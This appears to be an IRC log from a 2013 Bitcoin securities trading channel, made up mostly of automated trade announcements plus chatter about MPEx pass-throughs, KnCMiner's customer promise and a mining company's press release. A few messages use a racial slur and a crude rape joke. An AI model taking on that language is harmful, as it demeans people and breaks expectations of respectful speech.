9.18 BTC [+] Jul 19 05:30:42 why not? didn't you see how fast the IPO went? Not everybody has an MPEx account Jul 19 05:30:51 i suppose next week i'll get all the "when are divs" comments Jul 19 05:31:20 lol Jul 19 05:31:26 because it doesnt pay divs, and the customer base on mpex is a little different Jul 19 05:31:27 by the way, I just bought a couple shares on BitFunder, when are the divs coming? ;P Jul 19 05:31:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.044 = 0.132 BTC [+] Jul 19 05:31:34 i assumed theyd see "no divs" Jul 19 05:31:38 and say fuck that Jul 19 05:31:47 i assumed theyd read the description Jul 19 05:31:49 that was my mistake Jul 19 05:31:58 [HAVELOCK] [AM100] 26 @ 0.0455 = 1.183 BTC [-] Jul 19 05:32:37 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 05:32:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [+] Jul 19 05:33:26 maybe if you gety any sort of volume you can have your very own dedicated full time Jul 19 05:33:27 tiberius Jul 19 05:34:01 [BTCTC] [TAT.ASICMINER] 50 @ 0.043302 = 2.1651 BTC [-] Jul 19 05:34:32 [BTCTC] [TAT.ASICMINER] 39 @ 0.043301 = 1.6887 BTC [-] Jul 19 05:34:57 [BTCTC] [TAT.ASICMINER] 68 @ 0.0433 = 2.9444 BTC [-] Jul 19 05:35:19 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 19 05:36:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.044 = 0.132 BTC [+] Jul 19 05:37:16 [BTCTC] [AMC-PT] 109 @ 0.0025 = 0.2725 BTC [+] Jul 19 05:37:24 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 19 05:37:34 [BTCTC] [AMC-PT] 3190 @ 0.0025 = 7.975 BTC [+] Jul 19 05:37:52 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 05:38:11 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 05:38:14 [BTCTC] [AMC-PT] 2700 @ 0.0025 = 6.75 BTC [+] Jul 19 05:38:16 [HAVELOCK] [AM100] 200 @ 0.045 = 9 BTC [-] Jul 19 05:38:39 reading this discussion, it seems that there is a shortage of mpex pass throughs. if anyone cares to set me up as a PT, please pm me. I'm all manual, but might be a good backup. Jul 19 05:38:55 [HAVELOCK] [SMG] 500 @ 0.0003 = 0.15 BTC [-] Jul 19 05:39:50 [BTCTC] [BITVPS] 6 @ 0.00182 = 0.0109 BTC [+] Jul 19 05:39:51 the man says, after i open 2 PTs in one day Jul 19 05:40:13 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [+] Jul 19 05:40:14 did you just say you aren't set up with MPEX? Jul 19 05:40:16 [HAVELOCK] [SMG] 1000 @ 0.0003 = 0.3 BTC [-] Jul 19 05:40:25 that will be remedied this week Jul 19 05:40:35 sky_king_ not really. there's a shortage of people who put the 500-1k hours into reading all the shit and generally are ready to do a whole lot of very skilled labour. Jul 19 05:40:36 [HAVELOCK] [SMG] 2000 @ 0.0003 = 0.6 BTC [-] Jul 19 05:40:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00396 BTC [+] Jul 19 05:40:55 [HAVELOCK] [SMG] 1430 @ 0.0003 = 0.429 BTC [-] Jul 19 05:41:17 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 05:41:20 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 05:41:37 Just putting it out there. I know things. Jul 19 05:41:51 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 05:42:08 niggas be knowing shit yo Jul 19 05:42:48 during the day I know these things http://www.fisglobal.com/ Jul 19 05:43:15 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 05:43:18 [HAVELOCK] [AM100] 100 @ 0.045 = 4.5 BTC [-] Jul 19 05:43:19 this looks familiar Jul 19 05:43:50 passthroughs annoy me. giving up 5% of my dividends for what? to not have to open a coinbr account? Jul 19 05:43:59 sky_king_ ok, so what do you know about bitcoin finance, mpex, etc ? Jul 19 05:44:16 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 19 05:44:19 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 05:44:42 more understandable for something like asicminer that is so illiquid. Jul 19 05:45:43 [BTCTC] [AMC-PT] 5000 @ 0.0025 = 12.5 BTC [+] Jul 19 05:45:46 mp - I bought a seat to grab s.dice at like 78. then sold it at 18 a couple of weeks ago. Jul 19 05:46:25 sky_king_ so if you have a seat you certainly can get into the pt/investment game Jul 19 05:46:51 hopefully with better results than 78/18 Jul 19 05:47:04 [BTCTC] [CRYPTO-TRADE] 10 @ 0.194701 = 1.947 BTC [-] Jul 19 05:47:06 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1947 BTC [-] Jul 19 05:47:08 I'm in it. I'm one of the very few people that's been selling into mpoe recently. Jul 19 05:47:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1946 BTC [-] Jul 19 05:47:09 [BTCTC] [AMC-PT] 35 @ 0.002495 = 0.0873 BTC [-] Jul 19 05:47:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1945 BTC [-] Jul 19 05:47:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1944 BTC [-] Jul 19 05:47:14 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1943 BTC [-] Jul 19 05:47:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1942 BTC [-] Jul 19 05:47:17 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1941 BTC [-] Jul 19 05:47:18 [BTCTC] [CRYPTO-TRADE] 5 @ 0.194018 = 0.9701 BTC [-] Jul 19 05:47:45 sky_king: just in time for all the S.Dice people to push the S.MPOE price up Jul 19 05:47:54 people on btc-e claim litecoin is in a live beta on gox lol Jul 19 05:47:58 mp: pm Jul 19 05:48:02 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00396 = 0.0396 BTC [+] Jul 19 05:48:41 anybody want to give me a referal code for coinbr? Jul 19 05:48:43 peterl: yes, I bought most of them back for that reason. Jul 19 05:48:48 mike_c i guess some people just don't like to read or something Jul 19 05:48:52 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jul 19 05:49:03 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00396 = 0.0396 BTC [+] Jul 19 05:49:07 [BTCTC] [AMC-PT] 20 @ 0.002496 = 0.0499 BTC [-] Jul 19 05:49:28 peterl: https://coinbr.com/ref?c=y2suRtUgHs Jul 19 05:49:33 thanks Jul 19 05:50:02 np Jul 19 05:50:13 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00396 = 0.0396 BTC [+] Jul 19 05:50:23 [BTCTC] [AMC-PT] 61 @ 0.0025 = 0.1525 BTC [+] Jul 19 05:50:29 and deposits just flushed if anyone was waiting on anyrthing Jul 19 05:50:58 [BTCTC] [AMC-PT] 3500 @ 0.0025 = 8.75 BTC [+] Jul 19 05:52:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003961 BTC [+] Jul 19 05:53:05 mircea_popescu, thanks, i see the txn now.. damn thats a lotta BTC Jul 19 05:53:31 [BTCTC] [TAT.ASICMINER] 9 @ 0.043308 = 0.3898 BTC [-] Jul 19 05:54:38 about as much as went in, roughly Jul 19 05:54:54 [BTCTC] [AMC-PT] 155 @ 0.0025 = 0.3875 BTC [+] Jul 19 05:54:55 [BTCTC] [AMC-PT] 31 @ 0.0025 = 0.0775 BTC [+] Jul 19 05:55:15 [BTCTC] [AMC-PT] 750 @ 0.0025 = 1.875 BTC [+] Jul 19 05:56:08 wow knc are retarded Jul 19 05:56:25 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 05:57:02 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 19 05:57:57 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 05:58:08 [HAVELOCK] [AM100] 100 @ 0.045 = 4.5 BTC [-] Jul 19 05:58:42 great at writing letters though Jul 19 06:01:02 what nao ? Jul 19 06:01:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003959 = 0.0396 BTC [-] Jul 19 06:02:33 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003959 = 0.0396 BTC [-] Jul 19 06:02:40 the issued a customer protection promise Jul 19 06:02:46 that basically says Jul 19 06:03:03 we will not sell any hardware for 3mos after we sell out first batch Jul 19 06:03:11 to protect buyers from diff increase Jul 19 06:03:11 unless other people do Jul 19 06:03:13 (unless...) Jul 19 06:03:16 right Jul 19 06:03:17 heh Jul 19 06:03:18 lol right. Jul 19 06:03:18 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003959 = 0.0396 BTC [-] Jul 19 06:03:20 havelock payout is now complete Jul 19 06:03:21 for sdice shares Jul 19 06:03:24 because that's the problem, knc will flood the network. Jul 19 06:03:25 enjoy everyone! Jul 19 06:03:40 well they will keep flooding if thats what everyone else does Jul 19 06:03:49 a a Jul 19 06:03:59 so the customer can rest assured he won't be raped Jul 19 06:04:00 in the cunt. Jul 19 06:04:08 either DP or nothing Jul 19 06:04:15 the promise not to promise unless everyone else promises Jul 19 06:04:31 basically this is more liek seo Jul 19 06:04:49 google has done more damage to the world than microsoft by now. Jul 19 06:05:00 microsoft created a generation of drooling dweebs who expect to click on shit. Jul 19 06:05:07 but there's only about 500mn of them Jul 19 06:05:20 apple has perpetuated it Jul 19 06:05:22 google created a generation of clever chaps that use synonyms to "create original, fresh content" Jul 19 06:05:33 and there's 5bn of them all over india china south america etc Jul 19 06:05:40 ios can't in2 full-text search Jul 19 06:06:03 [TAT.MINIGAME] 400 @ 0.00045000 = 0.18000000 [+] is the sort order messed up on these asks ThickAsThieves? Jul 19 06:07:22 I would expect a few points over the best price not the worst Jul 19 06:07:22 [BTCTC] [BITVPS] 1 @ 0.00182 BTC [+] Jul 19 06:07:43 [BTCTC] [BTC-TRADING-PT] 50 @ 0.9772 = 48.86 BTC [+] Jul 19 06:07:45 [HAVELOCK] [SMG] 10 @ 0.0004 = 0.004 BTC [+] Jul 19 06:08:07 [BTCTC] [TAT.ASICMINER] 31 @ 0.044 = 1.364 BTC [+] Jul 19 06:09:38 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 19 06:14:50 [BTCTC] [AMC-PT] 600 @ 0.0025 = 1.5 BTC [+] Jul 19 06:15:26 [BTCTC] [AMC-PT] 120 @ 0.0025 = 0.3 BTC [+] Jul 19 06:16:20 [BTCTC] [AMC-PT] 3500 @ 0.0025 = 8.75 BTC [+] Jul 19 06:19:15 [BTCTC] [AMC-PT] 110 @ 0.0025 = 0.275 BTC [+] Jul 19 06:19:47 http://bitbet.us/propositions/ << bitbet now has a list of props Jul 19 06:19:53 wuill be populated with rejection reason too Jul 19 06:20:12 America: not all bad http://news.cnet.com/8301-17938_105-57594318-1/town-considers-licenses-for-drone-hunting/ Jul 19 06:20:34 not bad' Jul 19 06:20:53 list of props with no links? Jul 19 06:20:58 [HAVELOCK] [AM100] 3 @ 0.045 = 0.135 BTC [-] Jul 19 06:21:00 [HAVELOCK] [AM100] 181 @ 0.04554 = 8.2427 BTC [+] Jul 19 06:21:02 [HAVELOCK] [AM100] 25 @ 0.045546 = 1.1387 BTC [+] Jul 19 06:21:05 [HAVELOCK] [AM100] 10 @ 0.045548 = 0.4555 BTC [+] Jul 19 06:21:07 [HAVELOCK] [AM100] 148 @ 0.04555 = 6.7414 BTC [+] Jul 19 06:21:09 [HAVELOCK] [AM100] 72 @ 0.0455999 = 3.2832 BTC [+] Jul 19 06:21:11 [HAVELOCK] [AM100] 75 @ 0.0455999 = 3.42 BTC [+] Jul 19 06:21:13 [HAVELOCK] [AM100] 75 @ 0.04575 = 3.4313 BTC [+] Jul 19 06:21:15 [HAVELOCK] [AM100] 131 @ 0.04588 = 6.0103 BTC [+] Jul 19 06:21:16 [HAVELOCK] [AM100] 122 @ 0.04589 = 5.5986 BTC [+] Jul 19 06:21:18 [HAVELOCK] [AM100] 61 @ 0.04599999 = 2.806 BTC [+] Jul 19 06:21:30 you dont need links, everything gets rejected Jul 19 06:21:35 hehe Jul 19 06:22:56 [HAVELOCK] [AM100] 1 @ 0.044601 BTC [-] Jul 19 06:23:17 [BTCTC] [ASICMINER-PT] 5 @ 4.6 = 23 BTC [+] Jul 19 06:23:55 [HAVELOCK] [AM1] 1 @ 4.54 BTC [-] Jul 19 06:23:57 [HAVELOCK] [HIM] 8 @ 0.268 = 2.144 BTC [+] Jul 19 06:24:59 [BTCTC] [ASICMINER-PT] 3 @ 4.59999 = 13.8 BTC [-] Jul 19 06:29:57 [BTCTC] [DMS.SELLING] 24 @ 0.023 = 0.552 BTC [+] Jul 19 06:32:13 [BTCTC] [AMC-PT] 400 @ 0.002495 = 0.998 BTC [-] Jul 19 06:32:15 [BTCTC] [AMC-PT] 100 @ 0.002495 = 0.2495 BTC [-] Jul 19 06:32:16 [BTCTC] [AMC-PT] 50 @ 0.002495 = 0.1248 BTC [-] Jul 19 06:32:18 [BTCTC] [AMC-PT] 250 @ 0.002494 = 0.6235 BTC [-] Jul 19 06:32:20 [BTCTC] [AMC-PT] 3340 @ 0.0025 = 8.35 BTC [+] Jul 19 06:32:31 [BTCTC] [DMS.MINING] 29 @ 0.01575 = 0.4568 BTC [+] Jul 19 06:32:33 [BTCTC] [DMS.MINING] 65 @ 0.015788 = 1.0262 BTC [+] Jul 19 06:32:34 [BTCTC] [DMS.MINING] 27 @ 0.015789 = 0.4263 BTC [+] Jul 19 06:32:36 [BTCTC] [DMS.MINING] 32 @ 0.015799 = 0.5056 BTC [+] Jul 19 06:32:37 [BTCTC] [DMS.MINING] 97 @ 0.0158 = 1.5326 BTC [+] Jul 19 06:32:38 [BTCTC] [DMS.MINING] 30 @ 0.0159 = 0.477 BTC [+] Jul 19 06:32:40 [BTCTC] [DMS.MINING] 40 @ 0.015948 = 0.6379 BTC [+] Jul 19 06:32:41 [BTCTC] [DMS.MINING] 20 @ 0.01595 = 0.319 BTC [+] Jul 19 06:32:42 [BTCTC] [DMS.MINING] 39 @ 0.01599 = 0.6236 BTC [+] Jul 19 06:32:43 [BTCTC] [DMS.MINING] 300 @ 0.016 = 4.8 BTC [+] Jul 19 06:32:44 [BTCTC] [DMS.MINING] 43 @ 0.016099 = 0.6923 BTC [+] Jul 19 06:32:45 [BTCTC] [DMS.MINING] 75 @ 0.016199 = 1.2149 BTC [+] Jul 19 06:32:46 [BTCTC] [DMS.MINING] 19 @ 0.0162 = 0.3078 BTC [+] Jul 19 06:32:47 [BTCTC] [DMS.MINING] 18 @ 0.016246 = 0.2924 BTC [+] Jul 19 06:32:48 [BTCTC] [DMS.MINING] 36 @ 0.016249 = 0.585 BTC [+] Jul 19 06:33:05 [MPEX] [S.MG] 87150 @ 0.000225 = 19.6088 BTC [+] Jul 19 06:33:42 mike_c: has been done Jul 19 06:34:37 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003979 = 0.0398 BTC [+] Jul 19 06:34:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00398 BTC [+] Jul 19 06:34:40 [BTCTC] [TAT.VIRTUALMINE] 232 @ 0.003995 = 0.9268 BTC [+] Jul 19 06:34:42 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.004 = 1.2 BTC [+] Jul 19 06:34:44 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.00404 = 0.097 BTC [+] Jul 19 06:34:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004046 BTC [+] Jul 19 06:34:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004057 BTC [+] Jul 19 06:34:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004067 BTC [+] Jul 19 06:34:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004077 BTC [+] Jul 19 06:34:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004087 BTC [+] Jul 19 06:34:51 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004097 BTC [+] Jul 19 06:34:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004107 BTC [+] Jul 19 06:34:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004114 BTC [+] Jul 19 06:34:54 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004119 = 0.0082 BTC [+] Jul 19 06:34:55 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004124 = 0.0082 BTC [+] Jul 19 06:34:55 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004129 = 0.0083 BTC [+] Jul 19 06:34:57 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004135 = 0.0083 BTC [+] Jul 19 06:34:58 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004166 = 0.4166 BTC [+] Jul 19 06:34:59 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.0042 = 0.294 BTC [+] Jul 19 06:35:00 [BTCTC] [TAT.VIRTUALMINE] 997 @ 0.0042 = 4.1874 BTC [+] Jul 19 06:36:06 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.00385 = 0.462 BTC [-] Jul 19 06:36:08 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003841 = 0.0384 BTC [-] Jul 19 06:36:18 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00384 = 0.0384 BTC [-] Jul 19 06:36:20 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.003707 = 3.707 BTC [-] Jul 19 06:37:40 [BTCTC] [ASICMINER-PT] 1 @ 4.522301 BTC [-] Jul 19 06:37:50 [BTCTC] [BASIC-MINING] 3 @ 0.736999 = 2.211 BTC [+] Jul 19 06:38:19 [BTCTC] [ASICMINER-PT] 2 @ 4.522301 = 9.0446 BTC [-] Jul 19 06:39:11 [HAVELOCK] [AM100] 56 @ 0.045997 = 2.5758 BTC [+] Jul 19 06:39:36 [BTCTC] [BASIC-MINING] 3 @ 0.737 = 2.211 BTC [+] Jul 19 06:39:38 [HAVELOCK] [AM100] 39 @ 0.045997 = 1.7939 BTC [+] Jul 19 06:39:40 [HAVELOCK] [AM100] 111 @ 0.045998 = 5.1058 BTC [+] Jul 19 06:39:53 [BTCTC] [BASIC-MINING] 5 @ 0.737 = 3.685 BTC [+] Jul 19 06:40:11 http://www.nytimes.com/2013/07/19/opinion/krugman-hitting-chinas-wall.html?_r=0 Jul 19 06:40:29 [BTCTC] [BASIC-MINING] 5 @ 0.737 = 3.685 BTC [+] Jul 19 06:41:00 [HAVELOCK] [AM100] 27 @ 0.045997 = 1.2419 BTC [-] Jul 19 06:41:04 [23:33] <@assbot> [MPEX] [S.MG] 87150 @ 0.000225 = 19.6088 BTC [+] :( Jul 19 06:42:00 [HAVELOCK] [SMG] 4000 @ 0.0004 = 1.6 BTC [+] Jul 19 06:42:29 [HAVELOCK] [SMG] 42 @ 0.0004 = 0.0168 BTC [+] Jul 19 06:45:00 [HAVELOCK] [SMG] 2500 @ 0.000425 = 1.0625 BTC [+] Jul 19 06:45:39 [BTCTC] [BASIC-MINING] 15 @ 0.737 = 11.055 BTC [+] Jul 19 06:45:44 [BTCTC] [BASIC-MINING] 26 @ 0.7374 = 19.1724 BTC [+] Jul 19 06:45:57 [BTCTC] [ASICMINER-PT] 1 @ 4.5223 BTC [-] Jul 19 06:45:59 [BTCTC] [ASICMINER-PT] 1 @ 4.5112 BTC [-] Jul 19 06:46:01 [BTCTC] [ASICMINER-PT] 1 @ 4.51001 BTC [-] Jul 19 06:46:05 [BTCTC] [ASICMINER-PT] 4 @ 4.5 = 18 BTC [-] Jul 19 06:48:16 [BTCTC] [AMC-PT] 250 @ 0.002494 = 0.6235 BTC [-] Jul 19 06:48:56 [MPEX] [S.MG] 12850 @ 0.000225 = 2.8913 BTC [+] Jul 19 06:48:58 [MPEX] [S.MG] 99000 @ 0.00018101 = 17.92 BTC [-] Jul 19 06:49:03 [MPEX] [S.MG] 8150 @ 0.000181 = 1.4752 BTC [-] Jul 19 06:49:38 [BTCTC] [TAT.ASICMINER] 21 @ 0.04342 = 0.9118 BTC [-] Jul 19 06:50:21 [BTCTC] [BITVPS] 1 @ 0.00182 BTC [+] Jul 19 06:50:30 [BTCTC] [TAT.ASICMINER] 8 @ 0.04341 = 0.3473 BTC [-] Jul 19 06:50:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.04341 BTC [-] Jul 19 06:50:45 [BTCTC] [BITVPS] 1 @ 0.001801 BTC [-] Jul 19 06:51:35 [HAVELOCK] [SDSTM] 3 @ 0.01 = 0.03 BTC [-] Jul 19 06:52:28 [BTCTC] [AMC-PT] 500 @ 0.002492 = 1.246 BTC [-] Jul 19 06:53:14 [BTCTC] [AMC-PT] 2153 @ 0.002492 = 5.3653 BTC [-] Jul 19 06:54:39 wat Jul 19 06:55:54 [BTCTC] [DMS.SELLING] 2 @ 0.0241 = 0.0482 BTC [+] Jul 19 06:57:09 kakobrekla: that was quick. much better! Jul 19 06:57:35 :) Jul 19 06:58:33 [HAVELOCK] [AM100] 97 @ 0.0452 = 4.3844 BTC [-] Jul 19 06:58:48 [HAVELOCK] [AM100] 3 @ 0.0450001 = 0.135 BTC [-] Jul 19 06:59:33 [HAVELOCK] [SMG] 94 @ 0.000425 = 0.04 BTC [+] Jul 19 06:59:35 [HAVELOCK] [SMG] 100 @ 0.000351 = 0.0351 BTC [-] Jul 19 06:59:38 [HAVELOCK] [SMG] 5000 @ 0.00035 = 1.75 BTC [-] Jul 19 06:59:39 [HAVELOCK] [SMG] 4806 @ 0.0003 = 1.4418 BTC [-] Jul 19 07:00:15 [HAVELOCK] [SMG] 5194 @ 0.0003 = 1.5582 BTC [-] Jul 19 07:01:33 [BTCTC] [AMC-PT] 5555 @ 0.0025 = 13.8875 BTC [+] Jul 19 07:01:53 [HAVELOCK] [SDSTM] 200 @ 0.01 = 2 BTC [-] Jul 19 07:04:54 [HAVELOCK] [AM1] 1 @ 4.69 BTC [+] Jul 19 07:05:50 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [+] Jul 19 07:06:51 [BTCTC] [AMC-PT] 2302 @ 0.0025 = 5.755 BTC [+] Jul 19 07:08:15 [HAVELOCK] [SDSTM] 13 @ 0.01 = 0.13 BTC [-] Jul 19 07:11:45 [HAVELOCK] [SMG] 390 @ 0.000375 = 0.1463 BTC [+] Jul 19 07:12:18 [BTCTC] [AMC-PT] 20800 @ 0.0025 = 52 BTC [+] Jul 19 07:12:24 [HAVELOCK] [SMG] 400 @ 0.0002612 = 0.1045 BTC [-] Jul 19 07:12:27 [HAVELOCK] [SMG] 5000 @ 0.0002611 = 1.3055 BTC [-] Jul 19 07:12:29 [HAVELOCK] [SMG] 1000 @ 0.00026 = 0.26 BTC [-] Jul 19 07:12:30 [HAVELOCK] [SMG] 3000 @ 0.00025 = 0.75 BTC [-] Jul 19 07:12:32 [HAVELOCK] [SMG] 600 @ 0.000235 = 0.141 BTC [-] Jul 19 07:12:59 [BTCTC] [AMC-PT] 347 @ 0.002492 = 0.8647 BTC [-] Jul 19 07:13:04 [BTCTC] [AMC-PT] 50 @ 0.002492 = 0.1246 BTC [-] Jul 19 07:13:29 [HAVELOCK] [SDSTM] 20 @ 0.0101 = 0.202 BTC [+] Jul 19 07:13:39 [HAVELOCK] [SDSTM] 58 @ 0.0101 = 0.5858 BTC [+] Jul 19 07:13:42 [HAVELOCK] [SDSTM] 8 @ 0.01049 = 0.0839 BTC [+] Jul 19 07:13:44 [HAVELOCK] [SDSTM] 934 @ 0.0105 = 9.807 BTC [+] Jul 19 07:15:23 [BTCTC] [COGNITIVE] 1 @ 0.673004 BTC [-] Jul 19 07:15:34 [HAVELOCK] [SMG] 2110 @ 0.000375 = 0.7913 BTC [+] Jul 19 07:15:36 [HAVELOCK] [SMG] 2500 @ 0.0004 = 1 BTC [+] Jul 19 07:15:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.043504 = 0.1305 BTC [+] Jul 19 07:15:39 [HAVELOCK] [SMG] 2500 @ 0.000425 = 1.0625 BTC [+] Jul 19 07:15:41 [HAVELOCK] [SMG] 2500 @ 0.00045 = 1.125 BTC [+] Jul 19 07:15:44 [BTCTC] [AMC-PT] 500 @ 0.002492 = 1.246 BTC [-] Jul 19 07:16:11 [HAVELOCK] [SMG] 390 @ 0.00045 = 0.1755 BTC [+] Jul 19 07:16:40 [BTCTC] [AMC-PT] 50 @ 0.002492 = 0.1246 BTC [-] Jul 19 07:16:45 [BTCTC] [AMC-PT] 260 @ 0.002492 = 0.6479 BTC [-] Jul 19 07:17:05 [BTCTC] [AMC-PT] 20 @ 0.002492 = 0.0498 BTC [-] Jul 19 07:17:41 [BTCTC] [DMS.SELLING] 66 @ 0.023 = 1.518 BTC [-] Jul 19 07:18:19 [BTCTC] [AMC-PT] 500 @ 0.002492 = 1.246 BTC [-] Jul 19 07:18:42 [BTCTC] [AMC-PT] 100 @ 0.002492 = 0.2492 BTC [-] Jul 19 07:18:45 [HAVELOCK] [AM100] 7 @ 0.0455 = 0.3185 BTC [+] Jul 19 07:19:50 [HAVELOCK] [AM100] 20 @ 0.045 = 0.9 BTC [-] Jul 19 07:19:52 [HAVELOCK] [AM100] 97 @ 0.0446001 = 4.3262 BTC [-] Jul 19 07:19:55 [HAVELOCK] [AM100] 192 @ 0.0446 = 8.5632 BTC [-] Jul 19 07:21:31 [HAVELOCK] [SDSTM] 3 @ 0.0105 = 0.0315 BTC [+] Jul 19 07:22:26 [BTCTC] [AMC-PT] 45 @ 0.002492 = 0.1121 BTC [-] Jul 19 07:22:27 bASIC-Mining is pleased to announce the further expansion of it's ASIC mining hardware with the addition of a Butterfly Labs Bitforce Minirig SC. The Minirig SC will be expected to add 480 - 500Gh/s to bASIC-Mining's rapidly expanding hashrate. With this new addition bASIC-MINING has increased it's hashing power to approximately 925,000 Mh/s. Jul 19 07:23:14 let's do verbal tenses. Jul 19 07:23:26 is, will be expected, has increased Jul 19 07:23:40 present, future subjonctive, more than perfect. Jul 19 07:23:46 where the fuck do these people go to school ? Jul 19 07:24:03 don't shoot the messenger ;) Jul 19 07:24:09 :p Jul 19 07:24:30 [BTCTC] [AMC-PT] 11 @ 0.002492 = 0.0274 BTC [-] Jul 19 07:26:20 [HAVELOCK] [HIM] 2 @ 0.269 = 0.538 BTC [+] Jul 19 07:27:41 [BTCTC] [RSM] 1 @ 0.02 BTC [-] Jul 19 07:29:03 [BTCTC] [BASIC-MINING] 3 @ 0.736999 = 2.211 BTC [-] Jul 19 07:29:55 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 07:29:58 [BTCTC] [S.MPOE-PT] 12 @ 0.000882 = 0.0106 BTC [+] Jul 19 07:32:26 [HAVELOCK] [AM100] 19 @ 0.045498 = 0.8645 BTC [+] Jul 19 07:32:29 [BTCTC] [BASIC-MINING] 1 @ 0.737 BTC [+] Jul 19 07:32:30 [BTCTC] [BASIC-MINING] 8 @ 0.737399 = 5.8992 BTC [+] Jul 19 07:33:10 [BTCTC] [COGNITIVE] 6 @ 0.673003 = 4.038 BTC [-] Jul 19 07:33:10 [HAVELOCK] [AM100] 3 @ 0.045499 = 0.1365 BTC [+] Jul 19 07:33:13 [BTCTC] [COGNITIVE] 1 @ 0.673002 BTC [-] Jul 19 07:33:15 [BTCTC] [COGNITIVE] 1 @ 0.673 BTC [-] Jul 19 07:33:17 [BTCTC] [COGNITIVE] 5 @ 0.6721 = 3.3605 BTC [-] Jul 19 07:33:19 [BTCTC] [COGNITIVE] 3 @ 0.672008 = 2.016 BTC [-] Jul 19 07:33:21 [BTCTC] [COGNITIVE] 1 @ 0.672 BTC [-] Jul 19 07:33:23 [HAVELOCK] [SDSTM] 2 @ 0.0098 = 0.0196 BTC [-] Jul 19 07:33:25 [HAVELOCK] [SDSTM] 10 @ 0.0097 = 0.097 BTC [-] Jul 19 07:33:27 [HAVELOCK] [SDSTM] 16 @ 0.00966 = 0.1546 BTC [-] Jul 19 07:33:30 [HAVELOCK] [SDSTM] 45 @ 0.00965 = 0.4343 BTC [-] Jul 19 07:33:31 [BTCTC] [COGNITIVE] 1 @ 0.671004 BTC [-] Jul 19 07:33:32 [HAVELOCK] [AM100] 14 @ 0.045499 = 0.637 BTC [+] Jul 19 07:33:34 [BTCTC] [COGNITIVE] 1 @ 0.671 BTC [-] Jul 19 07:33:35 [BTCTC] [COGNITIVE] 1 @ 0.671 BTC [-] Jul 19 07:33:58 [BTCTC] [BASIC-MINING] 5 @ 0.7374 = 3.687 BTC [+] Jul 19 07:34:02 [BTCTC] [BASIC-MINING] 18 @ 0.7374 = 13.2732 BTC [+] Jul 19 07:34:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.043509 = 0.087 BTC [+] Jul 19 07:34:54 [BTCTC] [BASIC-MINING] 4 @ 0.7374 = 2.9496 BTC [+] Jul 19 07:35:37 [BTCTC] [BASIC-MINING] 1 @ 0.7374 BTC [+] Jul 19 07:36:16 [HAVELOCK] [AM100] 28 @ 0.0454998 = 1.274 BTC [+] Jul 19 07:36:53 [BTCTC] [BASIC-MINING] 14 @ 0.7374 = 10.3236 BTC [+] Jul 19 07:38:14 [HAVELOCK] [AM100] 9 @ 0.045499 = 0.4095 BTC [-] Jul 19 07:38:17 [HAVELOCK] [AM100] 13 @ 0.0454998 = 0.5915 BTC [+] Jul 19 07:38:20 [BTCTC] 